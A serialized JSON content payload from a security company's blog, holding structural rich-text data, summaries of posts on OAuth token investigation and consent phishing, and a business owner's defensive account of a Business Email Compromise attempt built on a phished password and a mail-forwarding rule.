ent":345312,"nodeType":178},{},[345313],{"data":345314,"marks":345315,"value":334013,"nodeType":173},{},[],{"data":345317,"content":345318,"nodeType":178},{},[345319],{"data":345320,"marks":345321,"value":334020,"nodeType":173},{},[],{"data":345323,"content":345324,"nodeType":178},{},[345325,345328,345335],{"data":345326,"marks":345327,"value":334027,"nodeType":173},{},[],{"data":345329,"content":345330,"nodeType":186},{"uri":334030},[345331],{"data":345332,"marks":345333,"value":334036,"nodeType":173},{},[345334],{"type":194},{"data":345336,"marks":345337,"value":334040,"nodeType":173},{},[],{"data":345339,"content":345340,"nodeType":250},{},[345341,345360,345379],{"data":345342,"content":345343,"nodeType":254},{},[345344],{"data":345345,"content":345346,"nodeType":178},{},[345347,345350,345357],{"data":345348,"marks":345349,"value":334053,"nodeType":173},{},[],{"data":345351,"content":345352,"nodeType":186},{"uri":318327},[345353],{"data":345354,"marks":345355,"value":334061,"nodeType":173},{},[345356],{"type":194},{"data":345358,"marks":345359,"value":53584,"nodeType":173},{},[],{"data":345361,"content":345362,"nodeType":254},{},[345363],{"data":345364,"content":345365,"nodeType":178},{},[345366,345369,345376],{"data":345367,"marks":345368,"value":334074,"nodeType":173},{},[],{"data":345370,"content":345371,"nodeType":186},{"uri":334077},[345372],{"data":345373,"marks":345374,"value":334083,"nodeType":173},{},[345375],{"type":194},{"data":345377,"marks":345378,"value":334087,"nodeType":173},{},[],{"data":345380,"content":345381,"nodeType":254},{},[345382],{"data":345383,"content":345384,"nodeType":178},{},[345385],{"data":345386,"marks":345387,"value":334097,"nodeType":173},{},[],{"data":345389,"content":345390,"nodeType":231},{},[],{"data":345392,"content":345393,"nodeType":178},{},[345394],{"data":345395,"marks":345396,"value":334107,"nodeType":173},{},[],{"data":345398,"content":345399,"nodeType":178},{},[345400,345403,345410,345413,345420,345423,345430,345433,345440,345443,345449],{"data":345401,"marks":345402,"value":334114,"nodeType":173},{},[],{"data":345404,"content":345405,"nodeType":186},{"uri":334117},[345406],{"data":345407,"marks":345408,"value":334123,"nodeType":173},{},[345409],{"type":194},{"data":345411,"marks":345412,"value":334127,"nodeType":173},{},[],{"data":345414,"content":345415,"nodeType":186},{"uri":334130},[345416],{"data":345417,"marks":345418,"value":334136,"nodeType":173},{},[345419],{"type":194},{"data":345421,"marks":345422,"value":334140,"nodeType":173},{},[],{"data":345424,"content":345425,"nodeType":186},{"uri":334143},[345426],{"data":345427,"marks":345428,"value":334149,"nodeType":173},{},[345429],{"type":194},{"data":345431,"marks":345432,"value":3949,"nodeType":173},{},[],{"data":345434,"content":345435,"nodeType":186},{"uri":334155},[345436],{"data":345437,"marks":345438,"value":334161,"nodeType":173},{},[345439],{"type":194},{"data":345441,"marks":345442,"value":334165,"nodeType":173},{},[],{"data":345444,"content":345445,"nodeType":186},{"uri":271579},[345446],{"data":345447,"marks":345448,"value":334172,"nodeType":173},{},[],{"data":345450,"marks":345451,"value":334176,"nodeType":173},{},[],{"data":345453,"content":345454,"nodeType":178},{},[345455,345458,345462],{"data":345456,"marks":345457,"value":334183,"nodeType":173},{},[],{"data":345459,"marks":345460,"value":334188,"nodeType":173},{},[345461],{"type":370},{"data":345463,"marks":345464,"value":334192,"nodeType":173},{},[],{"data":345466,"content":345467,"nodeType":178},{},[345468],{"data":345469,"marks":345470,"value":334199,"nodeType":173},{},[],{"data":345472,"content":345473,"nodeType":235},{},[345474],{"data":345475,"marks":345476,"value":334206,"nodeType":173},{},[],{"data":345478,"content":345479,"nodeType":178},{},[345480,345483,345490],{"data":345481,"marks":345482,"value":334213,"nodeType":173},{},[],{"data":345484,"content":345485,"nodeType":186},{"uri":334216},[345486],{"data":345487,"marks":345488,"value":334222,"nodeType":173},{},[345489],{"type":194},{"data":345491,"marks":345492,"value":197,"nodeType":173},{},[],{"data":345494,"content":345495,"nodeType":235},{},[345496],{"data":345497,"marks":345498,"value":334232,"nodeType":173},{},[],{"data":345500,"content":345501,"nodeType":178},{},[345502,345505,345513],{"data":345503,"marks":345504,"value":334239,"nodeType":173},{},[],{"data":345506,"content":345509,"nodeType":1698},{"target":345507},{"sys":345508},{"id":334244,"type":317,"linkType":318},[345510],{"data":345511,"marks":345512,"value":334249,"nodeType":173},{},[],{"data":345514,"marks":345515,"value":1477,"nodeType":173},{},[],{"data":345517,"content":345518,"nodeType":235},{},[345519],{"data":345520,"marks":345521,"value":334259,"nodeType":173},{},[],{"data":345523,"content":345524,"nodeType":178},{},[345525],{"data":345526,"marks":345527,"value":334266,"nodeType":173},{},[],{"data":345529,"content":345530,"nodeType":178},{},[345531],{"data":345532,"marks":345533,"value":334273,"nodeType":173},{},[],{"data":345535,"content":345536,"nodeType":235},{},[345537],{"data":345538,"marks":345539,"value":334280,"nodeType":173},{},[],{"data":345541,"content":345542,"nodeType":178},{},[345543],{"data":345544,"marks":345545,"value":334287,"nodeType":173},{},[],{"data":345547,"content":345548,"nodeType":178},{},[345549],{"data":345550,"marks":345551,"value":334294,"nodeType":173},{},[],{"data":345553,"content":345556,"nodeType":312},{"target":345554},{"sys":345555},{"id":334299,"type":317,"linkType":318},[],{"data":345558,"content":345559,"nodeType":235},{},[345560],{"data":345561,"marks":345562,"value":334307,"nodeType":173},{},[],{"data":345564,"content":345565,"nodeType":178},{},[345566],{"data":345567,"marks":345568,"value":334314,"nodeType":173},{},[],{"data":345570,"content":345571,"nodeType":178},{},[345572,345575,345579],{"data":345573,"marks":345574,"value":334321,"nodeType":173},{},[],{"data":345576,"marks":345577,"value":334326,"nodeType":173},{},[345578],{"type":1646},{"data":345580,"marks":345581,"value":334330,"nodeType":173},{},[],{"data":345583,"content":345584,"nodeType":231},{},[],{"data":345586,"content":345587,"nodeType":178},{},[345588,345591,345597],{"data":345589,"marks":345590,"value":334340,"nodeType":173},{},[],{"data":345592,"content":345593,"nodeType":186},{"uri":334343},[345594],{"data":345595,"marks":345596,"value":334123,"nodeType":173},{},[],{"data":345598,"marks":345599,"value":334351,"nodeType":173},{},[],{"data":345601,"content":345602,"nodeType":178},{},[345603,345606,345612],{"data":345604,"marks":345605,"value":334358,"nodeType":173},{},[],{"data":345607,"content":345608,"nodeType":186},{"uri":271579},[345609],{"data":345610,"marks":345611,"value":334365,"nodeType":173},{},[],{"data":345613,"marks":345614,"value":37,"nodeType":173},{},[],{"entries":345616},{"inline":345617,"hyperlink":345618,"block":345624},[],[345619],{"sys":345620,"__typename":6655,"title":345621,"slug":345622,"articleId":345623},{"id":334244},"What's the difference between application and delegated OAuth permissions on Microsoft 365?","application-and-delegated-oauth-permissions",10039,[345625,345631],{"sys":345626,"__typename":5345,"title":345627,"caption":345628,"layoutMode":112585,"file":345629},{"id":271484},"Consent phishing scopes","Microsoft OAuth integration screen",{"url":345630,"width":330097,"height":132213},"https://images.ctfassets.net/y1cdw1ablpvd/4z095o2LPpN7UmvHeTPi3U/5ff4d051360c244ba7f5ab332edea6ff/Scopes_v3.png",{"sys":345632,"__typename":5345,"title":345633,"caption":345634,"layoutMode":118,"file":345635},{"id":334299},"Example malicious Microsoft 365 OAuth app reply URL","Credit: Rob Lee from SANS (https://twitter.com/robtlee/status/1295847403942273038?s=20)",{"url":345636,"width":277481,"height":345637},"https://images.ctfassets.net/y1cdw1ablpvd/3ODNdUb4Bud2MRuwOrk4aw/bdce83ac22010681e4e24291f75caf97/Screenshot_2021-09-03_at_13.15.57.png",53,"content:blog:how-to-find-a-malicious-oauth-app-on-microsoft-365.json","blog/how-to-find-a-malicious-oauth-app-on-microsoft-365.json","blog/how-to-find-a-malicious-oauth-app-on-microsoft-365",{"_path":345642,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":345643,"ogImage":118,"summary":345645,"title":339344,"subtitle":118,"metaTitle":345656,"synopsis":339345,"hashTags":345657,"publishedDate":339352,"slug":339353,"tagsCollection":345658,"authorsCollection":345664,"content":345668,"relatedBlogPostsCollection":346038,"_id":346318,"_type":5439,"_source":5440,"_file":346319,"_stem":346320,"_extension":5439},"/blog/investigating-user-delegated-oauth-tokens-in-google-workspace-a-ride-along",{"id":338968,"publishedAt":345644},"2024-03-21T09:27:28.613Z",{"json":345646},{"data":345647,"content":345648,"nodeType":165},{},[345649],{"data":345650,"content":345651,"nodeType":178},{},[345652],{"data":345653,"marks":345654,"value":345655,"nodeType":173},{},[],"A brief discussion about OAuth tokens, how they are used, reasons you might want to review them, and then an exploration of how you might start actually doing this in Google Workspace, which (TL;DR) turns out to not be neither trivial or easy to automate.","Investigating user delegated OAuth tokens in Google",[339347,339348,339349,339350,339351],{"items":345659},[345660,345662],{"sys":345661,"name":509},{"id":508},{"sys":345663,"name":26137},{"id":26136},{"items":345665},[345666],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":345667},{"url":13981},{"json":345669,"links":345986},{"data":345670,"content":345671,"nodeType":165},{},[345672,345678,345684,345690,345695,345701,345707,345713,345743,345749,345755,345770,345775,345781,345787,345802,345807,345813,345828,345833,345862,345884,345889,345902,345924,345929,345935,345941,345946,345968,345974,345980],{"data":345673,"content":345674,"nodeType":235},{},[345675],{"data":345676,"marks":345677,"value":338979,"nodeType":173},{},[],{"data":345679,"content":345680,"nodeType":178},{},[345681],{"data":345682,"marks":345683,"value":338986,"nodeType":173},{},[],{"data":345685,"content":345686,"nodeType":178},{},[345687],{"data":345688,"marks":345689,"value":338993,"nodeType":173},{},[],{"data":345691,"content":345694,"nodeType":312},{"target":345692},{"sys":345693},{"id":338998,"type":317,"linkType":318},[],{"data":345696,"content":345697,"nodeType":178},{},[345698],{"data":345699,"marks":345700,"value":339006,"nodeType":173},{},[],{"data":345702,"content":345703,"nodeType":235},{},[345704],{"data":345705,"marks":345706,"value":339013,"nodeType":173},{},[],{"data":345708,"content":345709,"nodeType":178},{},[345710],{"data":345711,"marks":345712,"value":339020,"nodeType":173},{},[],{"data":345714,"content":345715,"nodeType":250},{},[345716,345725,345734],{"data":345717,"content":345718,"nodeType":254},{},[345719],{"data":345720,"content":345721,"nodeType":178},{},[345722],{"data":345723,"marks":345724,"value":339033,"nodeType":173},{},[],{"data":345726,"content":345727,"nodeType":254},{},[345728],{"data":345729,"content":345730,"nodeType":178},{},[345731],{"data":345732,"marks":345733,"value":339043,"nodeType":173},{},[],{"data":345735,"content":345736,"nodeType":254},{},[345737],{"data":345738,"content":345739,"nodeType":178},{},[345740],{"data":345741,"marks":345742,"value":339053,"nodeType":173},{},[],{"data":345744,"content":345745,"nodeType":178},{},[345746],{"data":345747,"marks":345748,"value":339060,"nodeType":173},{},[],{"data":345750,"content":345751,"nodeType":235},{},[345752],{"data":345753,"marks":345754,"value":339067,"nodeType":173},{},[],{"data":345756,"content":345757,"nodeType":178},{},[345758,345761,345767],{"data":345759,"marks":345760,"value":339074,"nodeType":173},{},[],{"data":345762,"content":345763,"nodeType":186},{"uri":271509},[345764],{"data":345765,"marks":345766,"value":339081,"nodeType":173},{},[],{"data":345768,"marks":345769,"value":339085,"nodeType":173},{},[],{"data":345771,"content":345774,"nodeType":312},{"target":345772},{"sys":345773},{"id":339090,"type":317,"linkType":318},[],{"data":345776,"content":345777,"nodeType":178},{},[345778],{"data":345779,"marks":345780,"value":339098,"nodeType":173},{},[],{"data":345782,"content":345783,"nodeType":178},{},[345784],{"data":345785,"marks":345786,"value":339105,"nodeType":173},{},[],{"data":345788,"content":345789,"nodeType":178},{},[345790,345793,345799],{"data":345791,"marks":345792,"value":320733,"nodeType":173},{},[],{"data":345794,"content":345795,"nodeType":186},{"uri":339114},[345796],{"data":345797,"marks":345798,"value":339119,"nodeType":173},{},[],{"data":345800,"marks":345801,"value":339123,"nodeType":173},{},[],{"data":345803,"content":345806,"nodeType":312},{"target":345804},{"sys":345805},{"id":339128,"type":317,"linkType":318},[],{"data":345808,"content":345809,"nodeType":178},{},[345810],{"data":345811,"marks":345812,"value":339136,"nodeType":173},{},[],{"data":345814,"content":345815,"nodeType":178},{},[345816,345819,345825],{"data":345817,"marks":345818,"value":339143,"nodeType":173},{},[],{"data":345820,"content":345821,"nodeType":186},{"uri":339146},[345822],{"data":345823,"marks":345824,"value":339151,"nodeType":173},{},[],{"data":345826,"marks":345827,"value":339155,"nodeType":173},{},[],{"data":345829,"content":345832,"nodeType":312},{"target":345830},{"sys":345831},{"id":339160,"type":317,"linkType":318},[],{"data":345834,"content":345835,"nodeType":178},{},[345836,345839,345845,345848,345852,345855,345859],{"data":345837,"marks":345838,"value":339168,"nodeType":173},{},[],{"data":345840,"content":345841,"nodeType":186},{"uri":334794},[345842],{"data":345843,"marks":345844,"value":339175,"nodeType":173},{},[],{"data":345846,"marks":345847,"value":339179,"nodeType":173},{},[],{"data":345849,"marks":345850,"value":339184,"nodeType":173},{},[345851],{"type":1646},{"data":345853,"marks":345854,"value":339188,"nodeType":173},{},[],{"data":345856,"marks":345857,"value":339184,"nodeType":173},{},[345858],{"type":1646},{"data":345860,"marks":345861,"value":339196,"nodeType":173},{},[],{"data":345863,"content":345864,"nodeType":178},{},[345865,345868,345872,345875,345881],{"data":345866,"marks":345867,"value":339203,"nodeType":173},{},[],{"data":345869,"marks":345870,"value":339208,"nodeType":173},{},[345871],{"type":1646},{"data":345873,"marks":345874,"value":339212,"nodeType":173},{},[],{"data":345876,"content":345877,"nodeType":186},{"uri":339215},[345878],{"data":345879,"marks":345880,"value":339220,"nodeType":173},{},[],{"data":345882,"marks":345883,"value":339224,"nodeType":173},{},[],{"data":345885,"content":345888,"nodeType":312},{"target":345886},{"sys":345887},{"id":339229,"type":317,"linkType":318},[],{"data":345890,"content":345891,"nodeType":178},{},[345892,345895,345899],{"data":345893,"marks":345894,"value":339237,"nodeType":173},{},[],{"data":345896,"marks":345897,"value":339184,"nodeType":173},{},[345898],{"type":1646},{"data":345900,"marks":345901,"value":339245,"nodeType":173},{},[],{"data":345903,"content":345904,"nodeType":178},{},[345905,345908,345912,345915,345921],{"data":345906,"marks":345907,"value":339252,"nodeType":173},{},[],{"data":345909,"marks":345910,"value":339184,"nodeType":173},{},[345911],{"type":1646},{"data":345913,"marks":345914,"value":339260,"nodeType":173},{},[],{"data":345916,"content":345917,"nodeType":186},{"uri":339263},[345918],{"data":345919,"marks":345920,"value":339268,"nodeType":173},{},[],{"data":345922,"marks":345923,"value":339272,"nodeType":173},{},[],{"data":345925,"content":345928,"nodeType":312},{"target":345926},{"sys":345927},{"id":339277,"type":317,"linkType":318},[],{"data":345930,"content":345931,"nodeType":178},{},[345932],{"data":345933,"marks":345934,"value":339285,"nodeType":173},{},[],{"data":345936,"content":345937,"nodeType":178},{},[345938],{"data":345939,"marks":345940,"value":339292,"nodeType":173},{},[],{"data":345942,"content":345945,"nodeType":312},{"target":345943},{"sys":345944},{"id":339297,"type":317,"linkType":318},[],{"data":345947,"content":345948,"nodeType":178},{},[345949,345952,345956,345959,345965],{"data":345950,"marks":345951,"value":339305,"nodeType":173},{},[],{"data":345953,"marks":345954,"value":339184,"nodeType":173},{},[345955],{"type":1646},{"data":345957,"marks":345958,"value":27978,"nodeType":173},{},[],{"data":345960,"content":345961,"nodeType":186},{"uri":339215},[345962],{"data":345963,"marks":345964,"value":339319,"nodeType":173},{},[],{"data":345966,"marks":345967,"value":339323,"nodeType":173},{},[],{"data":345969,"content":345970,"nodeType":235},{},[345971],{"data":345972,"marks":345973,"value":339330,"nodeType":173},{},[],{"data":345975,"content":345976,"nodeType":178},{},[345977],{"data":345978,"marks":345979,"value":339337,"nodeType":173},{},[],{"data":345981,"content":345982,"nodeType":178},{},[345983],{"data":345984,"marks":345985,"value":13836,"nodeType":173},{},[],{"entries":345987},{"hyperlink":345988,"inline":345989,"block":345990},[],[],[345991,345998,346005,346011,346017,346025,346031],{"sys":345992,"__typename":5345,"title":345993,"caption":345994,"layoutMode":112585,"file":345995},{"id":338998},"oauth consent screen example","Example of an OAuth consent screen in Google Workspace",{"url":345996,"width":330147,"height":345997},"https://images.ctfassets.net/y1cdw1ablpvd/5RrFP6v1oOwfg00Kg9OAVQ/dcad6df4ee4db41629e519e505cd4801/consent-screen.png",607,{"sys":345999,"__typename":5345,"title":346000,"caption":346001,"layoutMode":112585,"file":346002},{"id":339090},"OAuth app details","Apps with access to your account",{"url":346003,"width":277481,"height":346004},"https://images.ctfassets.net/y1cdw1ablpvd/3wvxHVo7ggg3Q6KLOJ0OBc/b05cd2cd5087b9415ad354409b92c628/Screenshot_2021-07-15_at_12.02.40.png",615,{"sys":346006,"__typename":5345,"title":346007,"caption":346007,"layoutMode":280280,"file":346008},{"id":339128},"User connected apps in Workspace admin console",{"url":346009,"width":333817,"height":346010},"https://images.ctfassets.net/y1cdw1ablpvd/3JwxdzuBQFtWZfZhnaJ9O7/dd6b85e70c0f12e37de811cb4d1a44d2/Screenshot_2021-07-15_at_12.12.41.png",225,{"sys":346012,"__typename":5345,"title":346013,"caption":346014,"layoutMode":280280,"file":346015},{"id":339160},"Workspace token audit report","Sample of a Workspace token audit report",{"url":346016,"width":333817,"height":272731},"https://images.ctfassets.net/y1cdw1ablpvd/1fvEWaCemaKVA4M8CUK9LI/0a6d69f932cf3e496b315e5412b8e6bb/audit-log.png",{"sys":346018,"__typename":5345,"title":346019,"caption":346020,"layoutMode":118,"file":346021},{"id":339229},"API Explorer for OAuth tokens resource","Sample output from API Explorer for OAuth tokens resource",{"url":346022,"width":346023,"height":346024},"https://images.ctfassets.net/y1cdw1ablpvd/1dMLvB8qIweqnIt9OXcGcW/c58d40cbce1e8fbd2a1848c97bed92c0/Screenshot_2021-07-15_at_12.29.21.png",380,428,{"sys":346026,"__typename":5345,"title":346027,"caption":346028,"layoutMode":118,"file":346029},{"id":339277},"Workspace admin console trusted apps detail","Example of the details of a trusted app",{"url":346030,"width":277481,"height":266381},"https://images.ctfassets.net/y1cdw1ablpvd/6tmcl2Z7ZZtFrih6VGUftC/f347fe1e70fb1e88d46c19dceb19e5f4/Screenshot_2021-07-15_at_12.38.57.png",{"sys":346032,"__typename":5345,"title":346033,"caption":346034,"layoutMode":118,"file":346035},{"id":339297},"Trusted OAuth apps in Workspace admin panel","Trusted OAuth apps with the same display name",{"url":346036,"width":277481,"height":346037},"https://images.ctfassets.net/y1cdw1ablpvd/MODcUpyrv9yjpgm5u75wn/690c8a732c0700d808a1b55063a17e02/Screenshot_2021-07-15_at_12.40.24.png",321,{"items":346039},[346040,346201],{"__typename":1528,"sys":346041,"content":346042,"title":271616,"synopsis":271617,"hashTags":118,"publishedDate":271618,"slug":271619,"tagsCollection":346191,"authorsCollection":346197},{"id":269414},{"json":346043},{"nodeType":165,"data":346044,"content":346045},{},[346046,346052,346058,346063,346076,346081,346087,346093,346117,346122,346137,346152,346167],{"nodeType":178,"data":346047,"content":346048},{},[346049],{"nodeType":173,"value":271448,"marks":346050,"data":346051},[],{},{"nodeType":178,"data":346053,"content":346054},{},[346055],{"nodeType":173,"value":271455,"marks":346056,"data":346057},[],{},{"nodeType":312,"data":346059,"content":346062},{"target":346060},{"sys":346061},{"id":271462,"type":317,"linkType":318},[],{"nodeType":178,"data":346064,"content":346065},{},[346066,346069,346073],{"nodeType":173,"value":271468,"marks":346067,"data":346068},[],{},{"nodeType":173,"value":271472,"marks":346070,"data":346072},[346071],{"type":370},{},{"nodeType":173,"value":271477,"marks":346074,"data":346075},[],{},{"nodeType":312,"data":346077,"content":346080},{"target":346078},{"sys":346079},{"id":271484,"type":317,"linkType":318},[],{"nodeType":178,"data":346082,"content":346083},{},[346084],{"nodeType":173,"value":271490,"marks":346085,"data":346086},[],{},{"nodeType":178,"data":346088,"content":346089},{},[346090],{"nodeType":173,"value":271497,"marks":346091,"data":346092},[],{},{"nodeType":178,"data":346094,"content":346095},{},[346096,346099,346105,346108,346114],{"nodeType":173,"value":271504,"marks":346097,"data":346098},[],{},{"nodeType":186,"data":346100,"content":346101},{"uri":271509},[346102],{"nodeType":173,"value":211147,"marks":346103,"data":346104},[],{},{"nodeType":173,"value":933,"marks":346106,"data":346107},[],{},{"nodeType":186,"data":346109,"content":346110},{"uri":271519},[346111],{"nodeType":173,"value":211157,"marks":346112,"data":346113},[],{},{"nodeType":173,"value":1477,"marks":346115,"data":346116},[],{},{"nodeType":312,"data":346118,"content":346121},{"target":346119},{"sys":346120},{"id":271531,"type":317,"linkType":318},[],{"nodeType":178,"data":346123,"content":346124},{},[346125,346128,346134],{"nodeType":173,"value":271537,"marks":346126,"data":346127},[],{},{"nodeType":186,"data":346129,"content":346130},{"uri":271542},[346131],{"nodeType":173,"value":271545,"marks":346132,"data":346133},[],{},{"nodeType":173,"value":271549,"marks":346135,"data":346136},[],{},{"nodeType":178,"data":346138,"content":346139},{},[346140,346143,346149],{"nodeType":173,"value":271556,"marks":346141,"data":346142},[],{},{"nodeType":186,"data":346144,"content":346145},{"uri":271561},[346146],{"nodeType":173,"value":148689,"marks":346147,"data":346148},[],{},{"nodeType":173,"value":271567,"marks":346150,"data":346151},[],{},{"nodeType":178,"data":346153,"content":346154},{},[346155,346158,346164],{"nodeType":173,"value":271574,"marks":346156,"data":346157},[],{},{"nodeType":186,"data":346159,"content":346160},{"uri":271579},[346161],{"nodeType":173,"value":271582,"marks":346162,"data":346163},[],{},{"nodeType":173,"value":271586,"marks":346165,"data":346166},[],{},{"nodeType":178,"data":346168,"content":346169},{},[346170,346173,346179,346182,346188],{"nodeType":173,"value":271593,"marks":346171,"data":346172},[],{},{"nodeType":186,"data":346174,"content":346175},{"uri":117883},[346176],{"nodeType":173,"value":271600,"marks":346177,"data":346178},[],{},{"nodeType":173,"value":2936,"marks":346180,"data":346181},[],{},{"nodeType":186,"data":346183,"content":346184},{"uri":117869},[346185],{"nodeType":173,"value":117876,"marks":346186,"data":346187},[],{},{"nodeType":173,"value":271613,"marks":346189,"data":346190},[],{},{"items":346192},[346193,346195],{"sys":346194,"name":505},{"id":504},{"sys":346196,"name":509},{"id":508},{"items":346198},[346199],{"fullName":271629,"firstName":71176,"jobTitle":271630,"profilePicture":346200},{"url":271632},{"__typename":1528,"sys":346202,"content":346203,"title":336733,"synopsis":346304,"hashTags":346305,"publishedDate":346307,"slug":336734,"tagsCollection":346308,"authorsCollection":346314},{"id":317985},{"json":346204},{"data":346205,"content":346206,"nodeType":165},{},[346207,346214,346217,346224,346231,346237,346244,346251,346258,346265,346272,346277,346284,346290,346297],{"data":346208,"content":346209,"nodeType":178},{},[346210],{"data":346211,"marks":346212,"value":346213,"nodeType":173},{},[],"The following is a personal account from the owner of an engineering consulting and projects company of how a Business Email Compromise (BEC) attack played out against his company, almost costing them millions.",{"data":346215,"content":346216,"nodeType":231},{},[],{"data":346218,"content":346219,"nodeType":178},{},[346220],{"data":346221,"marks":346222,"value":346223,"nodeType":173},{},[],"It started with a phone call from one of our customers. They wanted to make a payment to us and asked to confirm that our banking details had changed. They had not. Our customer explained they had received another email from us after our original invoice, stating that our banking details had changed.",{"data":346225,"content":346226,"nodeType":178},{},[346227],{"data":346228,"marks":346229,"value":346230,"nodeType":173},{},[],"So many questions ran through my mind. I assured them our details had not changed and asked them to send me the email that they had received.",{"data":346232,"content":346236,"nodeType":312},{"target":346233},{"sys":346234},{"id":346235,"type":317,"linkType":318},"7oS3I99lcdKeHo0a4SM7f2",[],{"data":346238,"content":346239,"nodeType":178},{},[346240],{"data":346241,"marks":346242,"value":346243,"nodeType":173},{},[],"There it was. It even had our company logo and signature at the bottom.",{"data":346245,"content":346246,"nodeType":178},{},[346247],{"data":346248,"marks":346249,"value":346250,"nodeType":173},{},[],"We didn't know how the attacker got access to that email account and we assumed they were logging in and reading emails. So we changed the password on the affected email account and moved on.",{"data":346252,"content":346253,"nodeType":178},{},[346254],{"data":346255,"marks":346256,"value":346257,"nodeType":173},{},[],"A day later, the attacker followed up again with the customer and we got another phone call. After having a really difficult conversation, we had to dig deeper and find out what was going on. So we contacted our IT provider and launched an investigation.",{"data":346259,"content":346260,"nodeType":178},{},[346261],{"data":346262,"marks":346263,"value":346264,"nodeType":173},{},[],"We found that the email we sent containing the invoice was also forwarded to an external Gmail address. The attacker had also registered a visually similar domain name and cloned the look and feel of our emails to reply to our customers and trick them into believing it was from us. This 1-letter difference in the domain is highlighted in the image above.",{"data":346266,"content":346267,"nodeType":178},{},[346268],{"data":346269,"marks":346270,"value":346271,"nodeType":173},{},[],"The primary culprit behind the forwarding of the message was then discovered. A mail rule had been created that forwarded emails with the word \"payment\" (among others) in the subject.",{"data":346273,"content":346276,"nodeType":312},{"target":346274},{"sys":346275},{"id":317780,"type":317,"linkType":318},[],{"data":346278,"content":346279,"nodeType":178},{},[346280],{"data":346281,"marks":346282,"value":346283,"nodeType":173},{},[],"Some senior employees had received phishing emails a few days prior to this incident taking place. The email took them to a fake Microsoft login page and unfortunately one of them entered their password.",{"data":346285,"content":346289,"nodeType":312},{"target":346286},{"sys":346287},{"id":346288,"type":317,"linkType":318},"3LqNjM8OlZLI6XQVtLaOe1",[],{"data":346291,"content":346292,"nodeType":178},{},[346293],{"data":346294,"marks":346295,"value":346296,"nodeType":173},{},[],"This stolen password was used to log in and set up the forwarding rule. This closed the loop and we understood what happened fully.",{"data":346298,"content":346299,"nodeType":178},{},[346300],{"data":346301,"marks":346302,"value":346303,"nodeType":173},{},[],"We learned a lot from the incident (and aged a few years!) and the main recommendations from our IT provider were to delete the mail rule, change the password again and enable MFA on all our email accounts. Had this customer paid this invoice without questioning the change of details, we would have lost millions.","A story by the owner of an Engineering company on how they almost lost millions from a Business Email Compromise (BEC) style attack. An interesting BEC example.",[317597,317598,317599,317600,346306],"warstory","2021-06-14T00:00:00.000+01:00",{"items":346309},[346310,346312],{"sys":346311,"name":505},{"id":504},{"sys":346313,"name":26133},{"id":26132},{"items":346315},[346316],{"fullName":274163,"firstName":274164,"jobTitle":274165,"profilePicture":346317},{"url":274167},"content:blog:investigating-user-delegated-oauth-tokens-in-google-workspace-a-ride-along.json","blog/investigating-user-delegated-oauth-tokens-in-google-workspace-a-ride-along.json","blog/investigating-user-delegated-oauth-tokens-in-google-workspace-a-ride-along",{"_path":346322,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":346323,"ogImage":118,"summary":346325,"title":271616,"subtitle":118,"metaTitle":346336,"synopsis":271617,"hashTags":118,"publishedDate":271618,"slug":271619,"tagsCollection":346337,"relatedBlogPostsCollection":346343,"authorsCollection":347171,"content":347175,"_id":347345,"_type":5439,"_source":5440,"_file":347346,"_stem":347347,"_extension":5439},"/blog/consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa",{"id":269414,"publishedAt":346324},"2025-04-28T18:08:44.737Z",{"json":346326},{"data":346327,"content":346328,"nodeType":165},{},[346329],{"data":346330,"content":346331,"nodeType":178},{},[346332],{"data":346333,"marks":346334,"value":346335,"nodeType":173},{},[],"Consent phishing is an emerging technique attackers are using to compromise user accounts, even if they have Multi-factor Authentication (MFA or 2FA) enabled. Consent phishing is particularly effective because it doesn’t exhibit many of the indicators that traditionally expose phishing attacks. However, there are sensible controls available. ","Consent phishing - the attack technique that bypasses 2FA",{"items":346338},[346339,346341],{"sys":346340,"name":505},{"id":504},{"sys":346342,"name":509},{"id":508},{"items":346344},[346345,346446,346755],{"__typename":1528,"sys":346346,"content":346347,"title":336733,"synopsis":346304,"hashTags":346435,"publishedDate":346307,"slug":336734,"tagsCollection":346436,"authorsCollection":346442},{"id":317985},{"json":346348},{"data":346349,"content":346350,"nodeType":165},{},[346351,346357,346360,346366,346372,346377,346383,346389,346395,346401,346407,346412,346418,346423,346429],{"data":346352,"content":346353,"nodeType":178},{},[346354],{"data":346355,"marks":346356,"value":346213,"nodeType":173},{},[],{"data":346358,"content":346359,"nodeType":231},{},[],{"data":346361,"content":346362,"nodeType":178},{},[346363],{"data":346364,"marks":346365,"value":346223,"nodeType":173},{},[],{"data":346367,"content":346368,"nodeType":178},{},[346369],{"data":346370,"marks":346371,"value":346230,"nodeType":173},{},[],{"data":346373,"content":346376,"nodeType":312},{"target":346374},{"sys":346375},{"id":346235,"type":317,"linkType":318},[],{"data":346378,"content":346379,"nodeType":178},{},[346380],{"data":346381,"marks":346382,"value":346243,"nodeType":173},{},[],{"data":346384,"content":346385,"nodeType":178},{},[346386],{"data":346387,"marks":346388,"value":346250,"nodeType":173},{},[],{"data":346390,"content":346391,"nodeType":178},{},[346392],{"data":346393,"marks":346394,"value":346257,"nodeType":173},{},[],{"data":346396,"content":346397,"nodeType":178},{},[346398],{"data":346399,"marks":346400,"value":346264,"nodeType":173},{},[],{"data":346402,"content":346403,"nodeType":178},{},[346404],{"data":346405,"marks":346406,"value":346271,"nodeType":173},{},[],{"data":346408,"content":346411,"nodeType":312},{"target":346409},{"sys":346410},{"id":317780,"type":317,"linkType":318},[],{"data":346413,"content":346414,"nodeType":178},{},[346415],{"data":346416,"marks":346417,"value":346283,"nodeType":173},{},[],{"data":346419,"content":346422,"nodeType":312},{"target":346420},{"sys":346421},{"id":346288,"type":317,"linkType":318},[],{"data":346424,"content":346425,"nodeType":178},{},[346426],{"data":346427,"marks":346428,"value":346296,"nodeType":173},{},[],{"data":346430,"content":346431,"nodeType":178},{},[346432],{"data":346433,"marks":346434,"value":346303,"nodeType":173},{},[],[317597,317598,317599,317600,346306],{"items":346437},[346438,346440],{"sys":346439,"name":505},{"id":504},{"sys":346441,"name":26133},{"id":26132},{"items":346443},[346444],{"fullName":274163,"firstName":274164,"jobTitle":274165,"profilePicture":346445},{"url":274167},{"__typename":1528,"sys":346447,"content":346448,"title":317594,"synopsis":317595,"hashTags":346744,"publishedDate":317603,"slug":317604,"tagsCollection":346745,"authorsCollection":346751},{"id":289406},{"json":346449},{"nodeType":165,"data":346450,"content":346451},{},[346452,346458,346463,346469,346485,346508,346514,346589,346604,346607,346613,346628,346634,346640,346643,346649,346686,346692,346707,346713,346716,346723,3